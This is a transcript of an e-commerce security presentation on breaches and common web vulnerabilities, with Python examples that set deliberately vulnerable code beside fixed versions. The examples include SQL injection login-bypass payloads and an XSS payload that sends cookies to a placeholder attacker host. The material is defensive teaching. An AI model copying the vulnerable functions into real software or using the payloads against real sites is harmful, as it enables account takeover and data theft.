E-commerce application security


Transcript of E-commerce application security

Page 2: E-commerce application security

E-commerce Application Security: Ways to secure your application from hackers

Building software is easy; building secure software is difficult. Vulnerabilities are inevitable, getting hacked is not.

Page 3: E-commerce application security

What is it all about?

• Importance of security in e-commerce

• Major attacks on e-commerce applications

• Common issues and vulnerabilities in applications

• What makes attackers target your application?

• Vulnerabilities that might be present in your application

• How do hackers attack your application?

• Do's and Don'ts to improve application security

You can also view a recorded session of this presentation here!

Page 4: E-commerce application security

How does security affect e-commerce?

• Tarnishes the company's reputation in public

• Huge financial loss due to post-breach activities such as email notification, patching, lost business etc.

• One breach invites many other hackers

• Loss of customers' trust

• Loss of business

Page 5: E-commerce application security

Ecommerce Hacks

What do eBay, Zappos (Amazon), Domino's and Starbucks have in common?

They all suffered huge data breaches in the last few years.

Page 6: E-commerce application security

eBay Data Breach

• Attackers compromised a small number of employee log-in credentials, gaining unauthorized access to eBay's corporate network

• The attackers obtained user information such as dates of birth, names, email addresses, phone numbers, residential addresses and (encrypted) passwords

Lessons to learn from this hack:

• Centralize application management

• Secure employees' personal accounts

• Enforce a strong password policy

• Take a proactive stance on security

Page 7: E-commerce application security

Starbucks Data Breach

• The Starbucks mobile app was hacked twice within a period of a few months

• Hackers stole money from several Starbucks customers by taking over their accounts and drawing on the linked credit cards

• Criminals used Starbucks accounts to access consumers' linked credit cards, and could steal hundreds of dollars in a matter of minutes

Lessons to learn from this hack:

• Secure the mobile application and its backend API

• Take proactive measures against cyber attacks, such as penetration testing and vulnerability assessments

Page 8: E-commerce application security

Commonly Exploited Vulnerabilities

• Injection attacks such as SQL injection, which lead to loss of critical data

• Improper implementation of the payment system, and logical vulnerabilities (see the X0RC0NF presentation)

• Insecure mobile applications and backend API servers

• Insecure direct object references: unrestricted access to subdomains

• Privilege escalation and authorization bypass

• Cross-site scripting: hijacking accounts

• Improper policy implementation, such as weak passwords and insecure storage

Page 9: E-commerce application security

Injection Attacks

Injection attacks can result in data loss or corruption, lack of accountability, denial of access or complete host takeover.

For example, SQL injection may lead to total compromise of your database: an attacker who controls part of a query can read or modify tables the application never intended to expose.
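As an added example (not code from the presentation), the following shows a login lookup written both ways against an in-memory SQLite database. The table, the two users and the placeholder password hashes are constructed sample data; the two payloads are the classic comment and tautology tricks.

```python
import sqlite3


def make_db():
    """Constructed sample data: two users with placeholder password hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password_hash) VALUES (?, ?)",
        [("alice", "hash-of-alice-pw"), ("admin", "hash-of-admin-pw")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password_hash):
    """Builds the query by string concatenation: user input becomes SQL syntax."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password_hash = '" + password_hash + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username, password_hash):
    """Uses placeholders: the driver passes values separately from the SQL text,
    so quotes, comments and OR clauses in the input are matched as plain data."""
    sql = "SELECT username FROM users WHERE username = ? AND password_hash = ?"
    row = conn.execute(sql, (username, password_hash)).fetchone()
    return row[0] if row else None


# Comment out the password check, or turn the WHERE clause into a tautology.
COMMENT_PAYLOAD = "admin' -- "
TAUTOLOGY_PAYLOAD = "' OR '1'='1"


def demo():
    conn = make_db()
    return {
        # The vulnerable query logs in as admin without knowing any password...
        "vulnerable_comment": login_vulnerable(conn, COMMENT_PAYLOAD, "wrong"),
        # ...or as the first user in the table with a username that does not exist.
        "vulnerable_tautology": login_vulnerable(conn, "nobody", TAUTOLOGY_PAYLOAD),
        # The parameterized query treats the same payloads as literal strings.
        "parameterized_comment": login_parameterized(conn, COMMENT_PAYLOAD, "wrong"),
        "parameterized_tautology": login_parameterized(conn, "nobody", TAUTOLOGY_PAYLOAD),
        # Legitimate credentials still work.
        "parameterized_legit": login_parameterized(conn, "alice", "hash-of-alice-pw"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, "->", result)
```

The parameterized version is the fix; input validation or quote-stripping on top of string concatenation is not, because the database still parses whatever survives the filter as SQL.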


Page 10: E-commerce application security

Payment system and logical vulnerabilities

Payment gateways are often found to be insecurely implemented, which can lead to attacks such as payment forgery or restriction bypass: the server charges whatever price, quantity or total the client submitted instead of what it computed itself.

Logical vulnerabilities are hard to discover but have a huge impact on the business.
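As an added example (not the presentation's code), here is a checkout validator that never trusts the price, quantity, discount or total fields sent by the client. The catalog, coupon table and the four sample requests are constructed assumptions for illustration.

```python
from decimal import Decimal, InvalidOperation

# Constructed server-side data: the only prices and discounts that count.
CATALOG = {"SKU-1001": Decimal("49.99"), "SKU-2002": Decimal("15.00")}
COUPONS = {"WELCOME10": Decimal("0.10")}   # fraction off the subtotal, applied once


class OrderError(ValueError):
    pass


def server_total(items, coupon=None):
    """Recompute the amount to charge from server-side data only.
    Client-sent unit prices, discounts and totals are never read here."""
    subtotal = Decimal("0")
    for item in items:
        sku, qty = item.get("sku"), item.get("qty")
        if sku not in CATALOG:
            raise OrderError("unknown sku: %r" % (sku,))
        # Negative or zero quantities are a classic way to turn a purchase into a credit.
        if isinstance(qty, bool) or not isinstance(qty, int) or qty <= 0:
            raise OrderError("invalid quantity for %s: %r" % (sku, qty))
        subtotal += CATALOG[sku] * qty
    if coupon is not None:
        if coupon not in COUPONS:
            raise OrderError("invalid coupon: %r" % (coupon,))
        subtotal -= subtotal * COUPONS[coupon]
    return subtotal.quantize(Decimal("0.01"))


def validate_checkout(request):
    """Return (accepted, reason, amount_to_charge).
    The amount handed to the payment gateway is always the server's figure."""
    try:
        expected = server_total(request.get("items", []), request.get("coupon"))
    except OrderError as e:
        return (False, str(e), None)
    if expected <= 0:
        return (False, "order total must be positive", None)
    try:
        claimed = Decimal(str(request.get("total", "0")))
    except InvalidOperation:
        return (False, "malformed total", None)
    # A mismatch means the client tampered with prices or the total: reject, do not "fix up".
    if claimed != expected:
        return (False, "client total %s does not match server total %s" % (claimed, expected), None)
    return (True, "ok", expected)


# Constructed requests as a client (or an attacker) would send them.
LEGIT = {"items": [{"sku": "SKU-1001", "qty": 2, "unit_price": "49.99"}], "total": "99.98"}
TAMPERED_TOTAL = {"items": [{"sku": "SKU-1001", "qty": 2, "unit_price": "0.49"}], "total": "0.98"}
NEGATIVE_QTY = {"items": [{"sku": "SKU-1001", "qty": 1}, {"sku": "SKU-2002", "qty": -3}], "total": "4.99"}
WITH_COUPON = {"items": [{"sku": "SKU-2002", "qty": 2}], "coupon": "WELCOME10", "total": "27.00"}

if __name__ == "__main__":
    for name, req in [("legit", LEGIT), ("tampered", TAMPERED_TOTAL),
                      ("negative", NEGATIVE_QTY), ("coupon", WITH_COUPON)]:
        print(name, "->", validate_checkout(req))
```

The same rule applies to the gateway callback: confirm the paid amount and currency against the order record on the server before marking it paid, rather than trusting a status field in a redirect URL.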


Page 11: E-commerce application security

Insecure mobile application and backend API server

Protecting only the web applications from hackers is not sufficient.

With the increased use of smartphones and tablets, the internet is flooded with mobile applications. These applications must also be secured against attacks, along with proper implementation of the API calls they make: the backend API has to enforce authentication and authorization itself, since anything checked only inside the mobile client can be bypassed by calling the API directly.


Page 12: E-commerce application security

Insecure direct object reference

Insecure direct object reference means referencing an object, such as a page or a file, directly through an identifier the application exposes, when that object was not meant to be reachable that way; changing an order number in a URL to read another customer's order is the typical case.

Such insecure entry points are often discovered in applications while performing a pentest.


Page 13: E-commerce application security

Privilege Escalation and authorization bypass

Privilege escalation enables an attacker to compromise a user's account by accessing resources that are meant to be private.

If the compromised account is that of an administrator, the attacker now controls the admin functionality.
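Both the insecure direct object reference slide and this one come down to a missing server-side check, so one added example (not the presentation's code) covers them: an order lookup with an ownership check, and a refund action with a role check. The users, orders and the `is_admin` request flag are constructed assumptions.

```python
# Constructed sample data: server-side user records and orders.
USERS = {
    "u1": {"role": "customer"},
    "u2": {"role": "customer"},
    "u9": {"role": "admin"},
}
ORDERS = {
    1001: {"owner": "u1", "total": "49.99", "refunded": False},
    1002: {"owner": "u2", "total": "15.00", "refunded": False},
}


class Forbidden(Exception):
    pass


def get_order_vulnerable(current_user, order_id):
    """IDOR: looks up by id only, so any signed-in user can read any order by guessing ids."""
    return ORDERS[order_id]


def get_order(current_user, order_id):
    """Ownership check. Missing and foreign orders get the same response,
    so the endpoint cannot be used to enumerate which ids exist."""
    order = ORDERS.get(order_id)
    is_admin = USERS.get(current_user, {}).get("role") == "admin"
    if order is None or (order["owner"] != current_user and not is_admin):
        raise Forbidden("order not found")
    return order


def refund_order_vulnerable(current_user, order_id, is_admin):
    """Authorization bypass: trusts an is_admin flag that arrived with the request
    (hidden form field, cookie, JSON body), which the client can simply set to true."""
    if not is_admin:
        raise Forbidden("admins only")
    ORDERS[order_id]["refunded"] = True
    return True


def require_role(role):
    """Decorator: the role is read from the server-side user record, never from the request."""
    def decorator(fn):
        def wrapper(current_user, *args, **kwargs):
            if USERS.get(current_user, {}).get("role") != role:
                raise Forbidden("%s only" % role)
            return fn(current_user, *args, **kwargs)
        return wrapper
    return decorator


@require_role("admin")
def refund_order(current_user, order_id):
    order = ORDERS.get(order_id)
    if order is None:
        raise Forbidden("order not found")
    order["refunded"] = True
    return True


def denied(fn, *args, **kwargs):
    """True if the call is refused with Forbidden (used to check the negative cases)."""
    try:
        fn(*args, **kwargs)
    except Forbidden:
        return True
    return False


if __name__ == "__main__":
    print("u2 reads u1's order via the vulnerable lookup:", get_order_vulnerable("u2", 1001))
    print("u2 reads u1's order via the checked lookup: denied =", denied(get_order, "u2", 1001))
    print("u1 refunds with a forged is_admin flag:", refund_order_vulnerable("u1", 1001, is_admin=True))
    print("u1 refunds via the role-checked action: denied =", denied(refund_order, "u1", 1002))
```

The horizontal case (customer to customer) and the vertical case (customer to admin) are found the same way in a pentest: replay a request from one session with another session's cookie, or with the identifier changed, and see whether the server still says yes.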


Page 14: E-commerce application security

Cross Site Scripting

Attackers can execute scripts in a victim's browser to hijack user sessions and steal cookies.

This is one of the most common attack vectors that attackers use to steal credentials and tokens and to perform targeted attacks.
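As an added example (not code from the presentation), the same product review is rendered unescaped and escaped, next to a session cookie set so that a script in the page cannot read it. The review text, the `attacker.example` host and the session id are constructed placeholders.

```python
from html import escape

# Constructed review carrying a cookie-stealing payload; attacker.example is a placeholder host.
REVIEW = {
    "author": "mallory",
    "text": '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>',
}


def render_review_vulnerable(review):
    """Reflects untrusted text straight into the HTML body: the browser runs the script."""
    return '<div class="review"><b>%s</b>: %s</div>' % (review["author"], review["text"])


def render_review(review):
    """Escapes for the HTML-body context: < > & " ' become entities and stay text.
    Attribute, JavaScript and URL contexts each need their own escaping rules."""
    return '<div class="review"><b>%s</b>: %s</div>' % (
        escape(review["author"]), escape(review["text"]))


def session_cookie_header(session_id):
    """HttpOnly keeps the session id out of document.cookie, so even a successful
    XSS cannot simply read it; Secure and SameSite limit where the browser sends it."""
    return "Set-Cookie: session=%s; HttpOnly; Secure; SameSite=Lax; Path=/" % session_id


def contains_script_tag(html):
    """Crude check used here only to compare the two renderings."""
    return "<script" in html.lower()


if __name__ == "__main__":
    print(render_review_vulnerable(REVIEW))
    print(render_review(REVIEW))
    print(session_cookie_header("constructed-session-id"))
```

Output encoding is the fix for the injection itself; the cookie flags only limit what a script can do once it runs, and a Content-Security-Policy header adds a further layer on top.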


Page 15: E-commerce application security

Improper Policy Implementations: A Weak Password

A weak password policy that allows users to set weak passwords makes the application vulnerable to attacks such as brute force and password guessing.
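As an added example (not the presentation's code), here is a password-policy check paired with a per-account login throttle, since a policy alone does not stop online guessing. The minimum length, the common-password list and the lockout thresholds are assumptions; a real deployment would use a full breached-password list or a k-anonymity lookup service.

```python
import time

# Constructed stub of a common/breached password list.
COMMON_PASSWORDS = {"password", "123456", "qwerty", "letmein", "welcome1"}
MIN_LENGTH = 12   # assumed policy value


def check_password(candidate, username):
    """Return a list of policy violations; an empty list means the password is acceptable."""
    problems = []
    if len(candidate) < MIN_LENGTH:
        problems.append("shorter than %d characters" % MIN_LENGTH)
    if candidate.lower() in COMMON_PASSWORDS:
        problems.append("appears in the common-password list")
    if username.lower() in candidate.lower():
        problems.append("contains the username")
    return problems


class LoginThrottle:
    """Refuse further attempts for an account after MAX_FAILURES failures inside WINDOW seconds.
    The clock is injectable so the behaviour can be checked without sleeping."""
    MAX_FAILURES = 5     # assumed threshold
    WINDOW = 300         # seconds, assumed

    def __init__(self, clock=time.monotonic):
        self.clock = clock
        self.failures = {}   # username -> list of failure timestamps

    def _recent(self, username, now):
        return [t for t in self.failures.get(username, []) if now - t < self.WINDOW]

    def is_locked(self, username):
        return len(self._recent(username, self.clock())) >= self.MAX_FAILURES

    def record_failure(self, username):
        now = self.clock()
        self.failures[username] = self._recent(username, now) + [now]

    def record_success(self, username):
        self.failures.pop(username, None)


def attempt_login(throttle, username, password_ok):
    """Gate a login attempt on the throttle; password_ok is the result of the real check."""
    if throttle.is_locked(username):
        return "locked"
    if password_ok:
        throttle.record_success(username)
        return "ok"
    throttle.record_failure(username)
    return "failed"


if __name__ == "__main__":
    print(check_password("password", "bob"))
    print(check_password("correct horse battery staple", "bob"))
    th = LoginThrottle()
    print([attempt_login(th, "bob", False) for _ in range(6)])
```

Lockout on failures per account can itself be abused to lock customers out, so many shops combine a short window with per-IP rate limits and a CAPTCHA step instead of a hard lock; the throttle above is the minimal form of that control.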


Page 16: E-commerce application security

Hacker’s Jackpot

• Credit card data and personal info such as phone numbers and addresses can be sold on the black market

• Personal info can be used for blackmail and phishing

• An unencrypted database can be sold very easily to competitors

“If you're a @dominos_pizzafr customer, u may want to know that we have offered Domino's not to publish your data in exchange for €30,000”

- Tweet by the hackers after the Domino's hack

Financial services are among the top 3 most attacked services on the internet

- 2015 DBIR (Verizon)


Page 17: E-commerce application security

What do hackers look for?

• Unpatched servers or network devices

• Insecure, vulnerable installations of known software such as WordPress

• Older/outdated software in use, with publicly available exploits

• Common vulnerabilities like CSRF, XSS, lack of HTTPS, brute-forcing etc.

• Subdomains without proper authorization, or publicly exposed sensitive data

“In our experience, 30-45% of applications have one or more critical vulnerabilities.”

47% of all breaches in the 2015 study were caused by malicious or criminal attacks.

- DBIR (Verizon)


Page 18: E-commerce application security

How hackers attack?

• Choosing the weakest link to attack: the web application, unpatched servers, employee credentials etc.

• Finding a vulnerability in the web application, exploiting it, and stealing credentials or user data

• One XSS on any page may lead to admin account compromise

• Searching for vulnerable installations of known software like WordPress or Magento

• Hacking a weak WordPress blog is far easier than hacking the main website itself

• Data exfiltration is done stealthily


Page 19: E-commerce application security

Safeguarding

• Proactively discover and remediate application vulnerabilities in a timely manner

• A good penetration test will discover logical vulnerabilities and authorization issues too

• Make sure to assess all subdomains, servers and accessible portals. It is not hidden just because you have not linked to it: a simple Google search such as “site:xyz.com -www” will reveal many subdomains

• Ensure strong encryption and policies are implemented on the application and the network

• Easy-to-find vulnerabilities do the most damage if left unfixed: XSS, CSRF, file uploads etc.

• Always audit the application server together with the web application

• Mobile applications are becoming an easy target for hackers; make sure to assess them for vulnerabilities

It might be dark, but the light is not very far


Page 20: E-commerce application security

Contact us


TOTHENEW helps its customers build e-commerce applications.
